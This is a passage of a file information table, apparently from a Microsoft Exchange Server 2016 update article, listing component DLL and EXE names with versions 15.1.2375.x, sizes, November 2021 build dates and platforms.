\nMicrosoft.exchange.mailboxtransport.storedriverdelivery.dll| 15.1.2375.17| 551,288| 3-Nov-21| 20:03| x86 \nMicrosoft.exchange.mailboxtransport.storedriverdelivery.eventlog.dll| 15.1.2375.17| 16,248| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.mailboxtransport.submission.eventlog.dll| 15.1.2375.17| 15,760| 3-Nov-21| 18:26| x64 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.dll| 15.1.2375.17| 320,888| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.mailboxtransport.submission.storedriversubmission.eventlog.dll| 15.1.2375.14| 17,808| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.mailboxtransport.syncdelivery.dll| 15.1.2375.17| 45,448| 3-Nov-21| 20:02| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.dll| 15.1.2375.17| 18,312| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.mailboxtransportwatchdogservicelet.eventlog.dll| 15.1.2375.17| 12,680| 3-Nov-21| 18:29| x64 \nMicrosoft.exchange.managedlexruntime.mppgruntime.dll| 15.1.2375.17| 20,880| 3-Nov-21| 18:10| x86 \nMicrosoft.exchange.management.activedirectory.dll| 15.1.2375.17| 415,096| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.management.classificationdefinitions.dll| 15.1.2375.17| 1,269,624| 3-Nov-21| 18:44| x86 \nMicrosoft.exchange.management.compliancepolicy.dll| 15.1.2375.17| 42,360| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.management.controlpanel.basics.dll| 15.1.2375.14| 433,544| 3-Nov-21| 18:09| x86 \nMicrosoft.exchange.management.controlpanel.dll| 15.1.2375.17| 4,564,872| 3-Nov-21| 22:20| x86 \nMicrosoft.exchange.management.controlpanel.owaoptionstrings.dll| 15.1.2375.17| 261,000| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.management.controlpanelmsg.dll| 15.1.2375.17| 33,680| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.management.deployment.analysis.dll| 15.1.2375.17| 94,088| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.management.deployment.dll| 15.1.2375.17| 595,856| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.management.deployment.xml.dll| 15.1.2375.17| 3,561,848| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.management.detailstemplates.dll| 15.1.2375.17| 67,976| 3-Nov-21| 20:47| x86 \nMicrosoft.exchange.management.dll| 15.1.2375.17| #########| 3-Nov-21| 20:31| x86 \nMicrosoft.exchange.management.edge.systemmanager.dll| 15.1.2375.17| 58,744| 3-Nov-21| 20:39| x86 \nMicrosoft.exchange.management.infrastructure.asynchronoustask.dll| 15.1.2375.17| 23,944| 3-Nov-21| 20:38| x86 \nMicrosoft.exchange.management.jitprovisioning.dll| 15.1.2375.17| 101,752| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.management.migration.dll| 15.1.2375.17| 544,144| 3-Nov-21| 20:35| x86 \nMicrosoft.exchange.management.mobility.dll| 15.1.2375.17| 305,016| 3-Nov-21| 20:35| x86 \nMicrosoft.exchange.management.nativeresources.dll| 15.1.2375.17| 131,960| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.management.powershell.support.dll| 15.1.2375.17| 418,704| 3-Nov-21| 20:37| x86 \nMicrosoft.exchange.management.provisioning.dll| 15.1.2375.17| 275,832| 3-Nov-21| 20:39| x86 \nMicrosoft.exchange.management.psdirectinvoke.dll| 15.1.2375.17| 70,520| 3-Nov-21| 20:42| x86 \nMicrosoft.exchange.management.rbacdefinition.dll| 15.1.2375.17| 7,878,024| 3-Nov-21| 19:17| x86 \nMicrosoft.exchange.management.recipient.dll| 15.1.2375.17| 1,501,072| 3-Nov-21| 20:36| x86 \nMicrosoft.exchange.management.reportingwebservice.dll| 15.1.2375.17| 145,272| 3-Nov-21| 20:47| x86 \nMicrosoft.exchange.management.reportingwebservice.eventlog.dll| 15.1.2375.17| 13,688| 3-Nov-21| 18:27| x64 \nMicrosoft.exchange.management.snapin.esm.dll| 15.1.2375.17| 71,560| 3-Nov-21| 20:40| x86 \nMicrosoft.exchange.management.systemmanager.dll| 15.1.2375.17| 1,301,392| 3-Nov-21| 20:36| x86 \nMicrosoft.exchange.management.transport.dll| 15.1.2375.17| 1,876,368| 3-Nov-21| 20:40| x86 \nMicrosoft.exchange.managementgui.dll| 15.1.2375.17| 5,225,864| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.managementmsg.dll| 15.1.2375.17| 36,216| 3-Nov-21| 18:26| x64 \nMicrosoft.exchange.mapihttpclient.dll| 15.1.2375.17| 117,640| 3-Nov-21| 18:39| x86 \nMicrosoft.exchange.mapihttphandler.dll| 15.1.2375.17| 209,808| 3-Nov-21| 20:37| x86 \nMicrosoft.exchange.messagesecurity.dll| 15.1.2375.17| 79,760| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.messagesecurity.messagesecuritymsg.dll| 15.1.2375.17| 17,296| 3-Nov-21| 18:12| x64 \nMicrosoft.exchange.messagingpolicies.dlppolicyagent.dll| 15.1.2375.17| 156,024| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.messagingpolicies.edgeagents.dll| 15.1.2375.17| 65,936| 3-Nov-21| 20:06| x86 \nMicrosoft.exchange.messagingpolicies.eventlog.dll| 15.1.2375.17| 30,584| 3-Nov-21| 18:21| x64 \nMicrosoft.exchange.messagingpolicies.filtering.dll| 15.1.2375.17| 58,240| 3-Nov-21| 20:02| x86 \nMicrosoft.exchange.messagingpolicies.hygienerules.dll| 15.1.2375.17| 29,584| 3-Nov-21| 20:08| x86 \nMicrosoft.exchange.messagingpolicies.journalagent.dll| 15.1.2375.17| 175,480| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.messagingpolicies.redirectionagent.dll| 15.1.2375.17| 28,560| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.messagingpolicies.retentionpolicyagent.dll| 15.1.2375.17| 75,128| 3-Nov-21| 20:09| x86 \nMicrosoft.exchange.messagingpolicies.rmsvcagent.dll| 15.1.2375.17| 206,224| 3-Nov-21| 20:08| x86 \nMicrosoft.exchange.messagingpolicies.rules.dll| 15.1.2375.17| 440,720| 3-Nov-21| 20:05| x86 \nMicrosoft.exchange.messagingpolicies.supervisoryreviewagent.dll| 15.1.2375.17| 83,320| 3-Nov-21| 20:09| x86 \nMicrosoft.exchange.messagingpolicies.transportruleagent.dll| 15.1.2375.17| 35,216| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.messagingpolicies.unifiedpolicycommon.dll| 15.1.2375.17| 53,136| 3-Nov-21| 20:08| x86 \nMicrosoft.exchange.messagingpolicies.unjournalagent.dll| 15.1.2375.17| 96,632| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.migration.dll| 15.1.2375.17| 1,109,904| 3-Nov-21| 20:13| x86 \nMicrosoft.exchange.migrationworkflowservice.eventlog.dll| 15.1.2375.17| 14,736| 3-Nov-21| 18:26| x64 \nMicrosoft.exchange.mitigation.service.eventlog.dll| 15.1.2375.14| 13,200| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.mitigation.service.exe| 15.1.2375.17| 81,784| 3-Nov-21| 20:46| x86 \nMicrosoft.exchange.mobiledriver.dll| 15.1.2375.17| 135,568| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.monitoring.activemonitoring.local.components.dll| 15.1.2375.17| 5,158,288| 3-Nov-21| 21:26| x86 \nMicrosoft.exchange.monitoring.servicecontextprovider.dll| 15.1.2375.17| 19,848| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.mrsmlbconfiguration.dll| 15.1.2375.17| 68,472| 3-Nov-21| 18:39| x86 \nMicrosoft.exchange.net.dll| 15.1.2375.17| 5,084,048| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.net.rightsmanagement.dll| 15.1.2375.17| 265,600| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.networksettings.dll| 15.1.2375.17| 37,760| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.notifications.broker.eventlog.dll| 15.1.2375.17| 14,200| 3-Nov-21| 18:12| x64 \nMicrosoft.exchange.notifications.broker.exe| 15.1.2375.17| 549,256| 3-Nov-21| 21:14| x86 \nMicrosoft.exchange.oabauthmodule.dll| 15.1.2375.17| 22,928| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.oabrequesthandler.dll| 15.1.2375.17| 106,376| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.oauth.core.dll| 15.1.2375.17| 291,704| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.objectstoreclient.dll| 15.1.2375.14| 17,280| 3-Nov-21| 18:09| x86 \nMicrosoft.exchange.odata.configuration.dll| 15.1.2375.17| 277,880| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.odata.dll| 15.1.2375.17| 2,994,056| 3-Nov-21| 21:11| x86 \nMicrosoft.exchange.officegraph.common.dll| 15.1.2375.17| 89,976| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.officegraph.grain.dll| 15.1.2375.17| 101,768| 3-Nov-21| 19:52| x86 \nMicrosoft.exchange.officegraph.graincow.dll| 15.1.2375.17| 38,280| 3-Nov-21| 19:52| x86 \nMicrosoft.exchange.officegraph.graineventbasedassistants.dll| 15.1.2375.17| 45,448| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.officegraph.grainpropagationengine.dll| 15.1.2375.17| 58,248| 3-Nov-21| 19:49| x86 \nMicrosoft.exchange.officegraph.graintransactionstorage.dll| 15.1.2375.17| 147,320| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.officegraph.graintransportdeliveryagent.dll| 15.1.2375.17| 26,488| 3-Nov-21| 19:52| x86 \nMicrosoft.exchange.officegraph.graphstore.dll| 15.1.2375.17| 183,160| 3-Nov-21| 19:30| x86 \nMicrosoft.exchange.officegraph.permailboxkeys.dll| 15.1.2375.17| 26,512| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.officegraph.secondarycopyquotamanagement.dll| 15.1.2375.17| 38,280| 3-Nov-21| 19:54| x86 \nMicrosoft.exchange.officegraph.secondaryshallowcopylocation.dll| 15.1.2375.17| 55,696| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.officegraph.security.dll| 15.1.2375.17| 147,344| 3-Nov-21| 19:29| x86 \nMicrosoft.exchange.officegraph.semanticgraph.dll| 15.1.2375.17| 191,864| 3-Nov-21| 19:52| x86 \nMicrosoft.exchange.officegraph.tasklogger.dll| 15.1.2375.17| 33,672| 3-Nov-21| 19:48| x86 \nMicrosoft.exchange.partitioncache.dll| 15.1.2375.17| 28,048| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.passivemonitoringsettings.dll| 15.1.2375.17| 32,648| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.photogarbagecollectionservicelet.dll| 15.1.2375.17| 15,240| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.pop3.eventlog.dll| 15.1.2375.17| 17,288| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.pop3.eventlog.dll.fe| 15.1.2375.17| 17,288| 3-Nov-21| 18:19| Not applicable \nMicrosoft.exchange.pop3.exe| 15.1.2375.17| 106,896| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.pop3.exe.fe| 15.1.2375.17| 106,896| 3-Nov-21| 19:47| Not applicable \nMicrosoft.exchange.pop3service.exe| 15.1.2375.17| 24,960| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.pop3service.exe.fe| 15.1.2375.17| 24,960| 3-Nov-21| 19:47| Not applicable \nMicrosoft.exchange.popconfiguration.dl1| 15.1.2375.17| 42,888| 3-Nov-21| 18:36| Not applicable \nMicrosoft.exchange.popimap.core.dll| 15.1.2375.17| 262,032| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.popimap.core.dll.fe| 15.1.2375.17| 262,032| 3-Nov-21| 19:47| Not applicable \nMicrosoft.exchange.powersharp.dll| 15.1.2375.17| 357,768| 3-Nov-21| 18:12| x86 \nMicrosoft.exchange.powersharp.management.dll| 15.1.2375.17| 4,169,592| 3-Nov-21| 20:44| x86 \nMicrosoft.exchange.powershell.configuration.dll| 15.1.2375.17| 326,008| 3-Nov-21| 20:45| x64 \nMicrosoft.exchange.powershell.rbachostingtools.dll| 15.1.2375.17| 41,360| 3-Nov-21| 20:44| x86 \nMicrosoft.exchange.protectedservicehost.exe| 15.1.2375.17| 30,584| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.protocols.fasttransfer.dll| 15.1.2375.17| 134,032| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.protocols.mapi.dll| 15.1.2375.17| 436,624| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.provisioning.eventlog.dll| 15.1.2375.17| 14,216| 3-Nov-21| 18:12| x64 \nMicrosoft.exchange.provisioningagent.dll| 15.1.2375.17| 224,144| 3-Nov-21| 20:35| x86 \nMicrosoft.exchange.provisioningservicelet.dll| 15.1.2375.17| 105,848| 3-Nov-21| 20:34| x86 \nMicrosoft.exchange.pst.dll| 15.1.2375.17| 168,840| 3-Nov-21| 18:10| x86 \nMicrosoft.exchange.pst.dll.deploy| 15.1.2375.17| 168,840| 3-Nov-21| 18:10| Not applicable \nMicrosoft.exchange.pswsclient.dll| 15.1.2375.17| 259,448| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.publicfolders.dll| 15.1.2375.17| 72,072| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.pushnotifications.crimsonevents.dll| 15.1.2375.17| 215,928| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.pushnotifications.dll| 15.1.2375.17| 106,888| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.pushnotifications.publishers.dll| 15.1.2375.17| 425,336| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.pushnotifications.server.dll| 15.1.2375.17| 70,520| 3-Nov-21| 19:48| x86 \nMicrosoft.exchange.query.analysis.dll| 15.1.2375.17| 45,944| 3-Nov-21| 20:14| x86 \nMicrosoft.exchange.query.configuration.dll| 15.1.2375.17| 206,728| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.query.core.dll| 15.1.2375.17| 163,216| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.query.ranking.dll| 15.1.2375.17| 342,392| 3-Nov-21| 20:14| x86 \nMicrosoft.exchange.query.retrieval.dll| 15.1.2375.17| 149,368| 3-Nov-21| 20:16| x86 \nMicrosoft.exchange.query.suggestions.dll| 15.1.2375.17| 95,096| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.realtimeanalyticspublisherservicelet.dll| 15.1.2375.17| 127,376| 3-Nov-21| 20:03| x86 \nMicrosoft.exchange.relevance.core.dll| 15.1.2375.17| 63,352| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.relevance.data.dll| 15.1.2375.17| 36,752| 3-Nov-21| 19:25| x64 \nMicrosoft.exchange.relevance.mailtagger.dll| 15.1.2375.17| 17,784| 3-Nov-21| 19:15| x64 \nMicrosoft.exchange.relevance.people.dll| 15.1.2375.17| 9,666,952| 3-Nov-21| 20:09| x86 \nMicrosoft.exchange.relevance.peopleindex.dll| 15.1.2375.17| #########| 3-Nov-21| 18:44| x64 \nMicrosoft.exchange.relevance.peopleranker.dll| 15.1.2375.17| 36,728| 3-Nov-21| 18:39| x86 \nMicrosoft.exchange.relevance.perm.dll| 15.1.2375.17| 97,672| 3-Nov-21| 18:11| x64 \nMicrosoft.exchange.relevance.sassuggest.dll| 15.1.2375.17| 28,536| 3-Nov-21| 18:36| x64 \nMicrosoft.exchange.relevance.upm.dll| 15.1.2375.17| 72,072| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.routing.client.dll| 15.1.2375.17| 15,752| 3-Nov-21| 18:39| x86 \nMicrosoft.exchange.routing.eventlog.dll| 15.1.2375.17| 13,192| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.routing.server.exe| 15.1.2375.17| 58,760| 3-Nov-21| 19:48| x86 \nMicrosoft.exchange.rpc.dll| 15.1.2375.17| 1,683,320| 3-Nov-21| 18:36| x64 \nMicrosoft.exchange.rpcclientaccess.dll| 15.1.2375.17| 209,800| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.rpcclientaccess.exmonhandler.dll| 15.1.2375.17| 60,304| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.rpcclientaccess.handler.dll| 15.1.2375.17| 517,496| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.rpcclientaccess.monitoring.dll| 15.1.2375.17| 160,648| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.rpcclientaccess.parser.dll| 15.1.2375.17| 720,760| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.rpcclientaccess.server.dll| 15.1.2375.17| 243,080| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.rpcclientaccess.service.eventlog.dll| 15.1.2375.17| 20,856| 3-Nov-21| 18:26| x64 \nMicrosoft.exchange.rpcclientaccess.service.exe| 15.1.2375.17| 35,216| 3-Nov-21| 20:36| x86 \nMicrosoft.exchange.rpchttpmodules.dll| 15.1.2375.17| 42,360| 3-Nov-21| 19:49| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.dll| 15.1.2375.17| 56,184| 3-Nov-21| 20:33| x86 \nMicrosoft.exchange.rpcoverhttpautoconfig.eventlog.dll| 15.1.2375.14| 27,536| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.rules.common.dll| 15.1.2375.17| 130,448| 3-Nov-21| 18:51| x86 \nMicrosoft.exchange.saclwatcher.eventlog.dll| 15.1.2375.17| 14,712| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.saclwatcherservicelet.dll| 15.1.2375.17| 20,360| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.safehtml.dll| 15.1.2375.17| 21,392| 3-Nov-21| 18:11| x86 \nMicrosoft.exchange.sandbox.activities.dll| 15.1.2375.17| 267,640| 3-Nov-21| 18:21| x86 \nMicrosoft.exchange.sandbox.contacts.dll| 15.1.2375.17| 110,992| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.sandbox.core.dll| 15.1.2375.17| 112,520| 3-Nov-21| 18:10| x86 \nMicrosoft.exchange.sandbox.services.dll| 15.1.2375.17| 622,456| 3-Nov-21| 18:19| x86 \nMicrosoft.exchange.search.bigfunnel.dll| 15.1.2375.17| 162,168| 3-Nov-21| 20:17| x86 \nMicrosoft.exchange.search.bigfunnel.eventlog.dll| 15.1.2375.17| 12,152| 3-Nov-21| 18:13| x64 \nMicrosoft.exchange.search.blingwrapper.dll| 15.1.2375.17| 19,344| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.search.core.dll| 15.1.2375.17| 209,288| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.search.ediscoveryquery.dll| 15.1.2375.17| 17,784| 3-Nov-21| 20:19| x86 \nMicrosoft.exchange.search.engine.dll| 15.1.2375.17| 96,648| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.search.fast.configuration.dll| 15.1.2375.17| 16,760| 3-Nov-21| 18:39| x86 \nMicrosoft.exchange.search.fast.dll| 15.1.2375.17| 435,080| 3-Nov-21| 19:48| x86 \nMicrosoft.exchange.search.files.dll| 15.1.2375.17| 274,320| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.search.flighting.dll| 15.1.2375.17| 24,952| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.search.mdb.dll| 15.1.2375.17| 218,504| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.search.service.exe| 15.1.2375.17| 26,488| 3-Nov-21| 19:52| x86 \nMicrosoft.exchange.security.applicationencryption.dll| 15.1.2375.17| 162,176| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.security.dll| 15.1.2375.17| 1,555,344| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.security.msarpsservice.exe| 15.1.2375.17| 19,848| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.security.securitymsg.dll| 15.1.2375.14| 28,552| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.server.storage.admininterface.dll| 15.1.2375.17| 222,608| 3-Nov-21| 20:09| x86 \nMicrosoft.exchange.server.storage.common.dll| 15.1.2375.17| 1,110,896| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.1.2375.17| 212,368| 3-Nov-21| 20:06| x86 \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.1.2375.17| 113,552| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.1.2375.17| 82,824| 3-Nov-21| 19:15| x64 \nMicrosoft.exchange.server.storage.eventlog.dll| 15.1.2375.17| 80,760| 3-Nov-21| 18:12| x64 \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.1.2375.17| 66,424| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.server.storage.ha.dll| 15.1.2375.17| 81,296| 3-Nov-21| 20:02| x86 \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.1.2375.17| 207,752| 3-Nov-21| 19:53| x86 \nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.1.2375.17| 1,162,128| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.1.2375.17| 504,200| 3-Nov-21| 20:04| x86 \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.1.2375.17| 47,480| 3-Nov-21| 19:52| x86 \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.1.2375.17| 848,272| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.1.2375.17| 1,219,960| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.server.storage.propertytag.dll| 15.1.2375.17| 30,600| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.1.2375.17| 120,200| 3-Nov-21| 20:09| x86 \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.1.2375.17| 1,009,040| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.1.2375.17| 110,992| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.server.storage.workermanager.dll| 15.1.2375.17| 34,696| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.server.storage.xpress.dll| 15.1.2375.17| 19,344| 3-Nov-21| 18:19| x86 \nMicrosoft.exchange.servicehost.eventlog.dll| 15.1.2375.17| 14,736| 3-Nov-21| 18:26| x64 \nMicrosoft.exchange.servicehost.exe| 15.1.2375.17| 60,792| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.1.2375.17| 50,552| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.eventlog.dll| 15.1.2375.17| 14,224| 3-Nov-21| 18:29| x64 \nMicrosoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll| 15.1.2375.14| 14,216| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.services.common.dll| 15.1.2375.17| 74,128| 3-Nov-21| 20:03| x86 \nMicrosoft.exchange.services.dll| 15.1.2375.17| 8,477,560| 3-Nov-21| 20:51| x86 \nMicrosoft.exchange.services.eventlogs.dll| 15.1.2375.17| 30,072| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.services.ewshandler.dll| 15.1.2375.17| 633,720| 3-Nov-21| 21:07| x86 \nMicrosoft.exchange.services.ewsserialization.dll| 15.1.2375.17| 1,651,080| 3-Nov-21| 20:54| x86 \nMicrosoft.exchange.services.json.dll| 15.1.2375.17| 296,312| 3-Nov-21| 20:58| x86 \nMicrosoft.exchange.services.messaging.dll| 15.1.2375.17| 43,408| 3-Nov-21| 20:53| x86 \nMicrosoft.exchange.services.onlinemeetings.dll| 15.1.2375.17| 232,840| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.services.surface.dll| 15.1.2375.17| 178,576| 3-Nov-21| 20:59| x86 \nMicrosoft.exchange.services.wcf.dll| 15.1.2375.17| 348,544| 3-Nov-21| 20:56| x86 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.1.2375.17| 56,720| 3-Nov-21| 18:29| x86 \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.1.2375.17| 98,184| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.setup.common.dll| 15.1.2375.17| 298,888| 3-Nov-21| 20:47| x86 \nMicrosoft.exchange.setup.commonbase.dll| 15.1.2375.17| 35,728| 3-Nov-21| 20:37| x86 \nMicrosoft.exchange.setup.console.dll| 15.1.2375.17| 27,016| 3-Nov-21| 20:49| x86 \nMicrosoft.exchange.setup.gui.dll| 15.1.2375.17| 117,112| 3-Nov-21| 20:49| x86 \nMicrosoft.exchange.setup.parser.dll| 15.1.2375.17| 55,160| 3-Nov-21| 20:35| x86 \nMicrosoft.exchange.setup.signverfwrapper.dll| 15.1.2375.17| 75,128| 3-Nov-21| 18:26| x64 \nMicrosoft.exchange.sharedcache.caches.dll| 15.1.2375.17| 142,728| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.sharedcache.client.dll| 15.1.2375.17| 24,968| 3-Nov-21| 18:39| x86 \nMicrosoft.exchange.sharedcache.eventlog.dll| 15.1.2375.17| 15,224| 3-Nov-21| 18:26| x64 \nMicrosoft.exchange.sharedcache.exe| 15.1.2375.17| 58,752| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.sharepointsignalstore.dll| 15.1.2375.17| 27,024| 3-Nov-21| 18:22| x86 \nMicrosoft.exchange.slabmanifest.dll| 15.1.2375.17| 46,984| 3-Nov-21| 18:10| x86 \nMicrosoft.exchange.sqm.dll| 15.1.2375.17| 46,984| 3-Nov-21| 18:26| x86 \nMicrosoft.exchange.store.service.exe| 15.1.2375.17| 28,048| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.store.worker.exe| 15.1.2375.17| 26,512| 3-Nov-21| 20:10| x86 \nMicrosoft.exchange.storeobjectsservice.eventlog.dll| 15.1.2375.17| 13,704| 3-Nov-21| 18:12| x64 \nMicrosoft.exchange.storeobjectsservice.exe| 15.1.2375.17| 31,624| 3-Nov-21| 19:47| x86 \nMicrosoft.exchange.storeprovider.dll| 15.1.2375.17| 1,166,712| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.structuredquery.dll| 15.1.2375.17| 158,608| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.symphonyhandler.dll| 15.1.2375.17| 628,104| 3-Nov-21| 20:21| x86 \nMicrosoft.exchange.syncmigration.eventlog.dll| 15.1.2375.17| 13,192| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.1.2375.17| 16,248| 3-Nov-21| 20:36| x86 \nMicrosoft.exchange.systemprobemsg.dll| 15.1.2375.17| 13,200| 3-Nov-21| 18:19| x64 \nMicrosoft.exchange.textprocessing.dll| 15.1.2375.17| 221,584| 3-Nov-21| 18:43| x86 \nMicrosoft.exchange.textprocessing.eventlog.dll| 15.1.2375.14| 13,704| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.1.2375.17| 29,048| 3-Nov-21| 20:03| x86 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.1.2375.17| 138,104| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.1.2375.17| 21,880| 3-Nov-21| 18:51| x86 \nMicrosoft.exchange.transport.agent.controlflow.dll| 15.1.2375.17| 40,336| 3-Nov-21| 20:03| x86 \nMicrosoft.exchange.transport.agent.faultinjectionagent.dll| 15.1.2375.17| 22,928| 3-Nov-21| 20:06| x86 \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.1.2375.17| 21,384| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.1.2375.17| 213,392| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.1.2375.17| 99,208| 3-Nov-21| 20:06| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.1.2375.17| 22,928| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.transport.agent.malware.dll| 15.1.2375.17| 169,336| 3-Nov-21| 20:19| x86 \nMicrosoft.exchange.transport.agent.malware.eventlog.dll| 15.1.2375.14| 18,296| 3-Nov-21| 18:09| x64 \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 15.1.2375.17| 20,880| 3-Nov-21| 19:31| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.1.2375.17| 31,608| 3-Nov-21| 20:03| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.1.2375.17| 46,992| 3-Nov-21| 20:03| x86 \nMicrosoft.exchange.transport.agent.search.dll| 15.1.2375.17| 30,096| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.1.2375.17| 53,128| 3-Nov-21| 19:29| x86 \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.1.2375.17| 47,480| 3-Nov-21| 20:01| x86 \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.1.2375.17| 18,320| 3-Nov-21| 19:15| x86 \nMicrosoft.exchange.transport.agent.transportfeatureoverrideagent.dll| 15.1.2375.17| 46,472| 3-Nov-21| 20:09| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.1.2375.17| 46,480| 3-Nov-21| 20:03| x86 